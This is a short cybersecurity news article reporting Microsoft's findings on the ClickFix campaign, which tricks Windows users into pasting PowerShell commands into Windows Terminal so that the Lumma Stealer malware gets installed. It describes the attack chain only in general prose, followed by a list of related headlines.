March 10, 2026

Lumma Stealer and ClickFix Malware Uncovered: A New Threat to Cybersecurity

Vaibhav March 10, 2026
Lumma-Stealer-and-ClickFix-Malware-Uncovered-A-New-Threat-to-Cybersecurity
Post Views: 8

Cybercriminals Use Novel Technique to Spread Lumma Stealer Malware

Cybercriminals have been using a novel technique to spread the Lumma Stealer malware, leveraging the Windows Terminal app to gain unauthorized access to targeted systems. This campaign, dubbed ClickFix, was first observed in February and involves tricking victims into launching Windows Terminal using the Windows + X shortcut, followed by pasting malicious PowerShell commands disguised as CAPTCHAs.

Attack Chain and Payload

Once the commands are executed, the attack triggers additional instances of Windows Terminal and PowerShell, ultimately leading to the loading of a ZIP payload and a renamed 7-Zip binary. This allows the attackers to establish persistence on the compromised machine, exfiltrate sensitive data, and deploy the Lumma Stealer malware.

Communication with Crypto Blockchain RPC Endpoints

In a separate attack chain, the malicious PowerShell command enables communication with Crypto Blockchain RPC endpoints, employing an etherhiding technique. The script also injects code into chrome.exe and msedge.exe processes using the QueueUserAPC() function, allowing the attackers to harvest web data and login credentials.

According to Microsoft’s Threat Intelligence team, the ClickFix campaign demonstrates the evolving tactics of threat actors, who are constantly seeking new ways to evade detection and compromise unsuspecting users. The use of Windows Terminal and PowerShell in this campaign highlights the importance of monitoring and securing these tools to prevent similar attacks in the future.

Lumma Stealer Malware and User Vigilance

The Lumma Stealer malware is a notorious information-stealing malware that can compromise sensitive data, including login credentials, cryptocurrency wallets, and other valuable information. Its deployment in the ClickFix campaign underscores the need for users to remain vigilant and cautious when interacting with unfamiliar commands or prompts.

Cat-and-Mouse Game Between Threat Actors and Cybersecurity Professionals

The ClickFix campaign is the latest example of the cat-and-mouse game between threat actors and cybersecurity professionals. As attackers continue to develop new techniques and tactics, it is essential for organizations to stay informed and adapt their security strategies to prevent and detect such threats.



About Author

Vaibhav

See author's posts

More Stories

Cylake-Secures-45-Million-to-Protect-Organizations-from-Cloud-Security-Barriers

Cylake Secures $45 Million to Protect Organizations from Cloud Security Barriers

Vaibhav March 10, 2026
Mitigating-Supply-Chain-Risks-Space-Threats-and-AI-Limitations-Insights-from-Airbus-Chief-Security-Officer

Mitigating Supply Chain Risks, Space Threats, and AI Limitations: Insights from Airbus’ Chief Security Officer

Vaibhav March 10, 2026
Bug-Bounties-Failing-to-Attract-Top-Security-Talent-A-Shift-in-the-Vulnerability-Disclosure-Landscape

Bug Bounties Failing to Attract Top Security Talent: A Shift in the Vulnerability Disclosure Landscape

Vaibhav March 10, 2026

Latest Cyber Security News

Runtime-Governance-and-Visibility-for-AI-Agents-with-Singulr-AI-s-Agent-Pulse

Runtime Governance and Visibility for AI Agents with Singulr AI’s Agent Pulse

Vaibhav March 10, 2026
OneTrust-Enhances-AI-Governance-with-Real-Time-Monitoring-and-Guardrail-Enforcement

OneTrust Enhances AI Governance with Real-Time Monitoring and Guardrail Enforcement

Vaibhav March 10, 2026
Ericsson-Employee-and-Customer-Data-Exposed-in-Cybersecurity-Breach

Ericsson Employee and Customer Data Exposed in Cybersecurity Breach

Vaibhav March 10, 2026
Cylake-Secures-45-Million-to-Protect-Organizations-from-Cloud-Security-Barriers

Cylake Secures $45 Million to Protect Organizations from Cloud Security Barriers

Vaibhav March 10, 2026
Mitigating-Supply-Chain-Risks-Space-Threats-and-AI-Limitations-Insights-from-Airbus-Chief-Security-Officer

Mitigating Supply Chain Risks, Space Threats, and AI Limitations: Insights from Airbus’ Chief Security Officer

Vaibhav March 10, 2026
en_USEnglish
en_USEnglish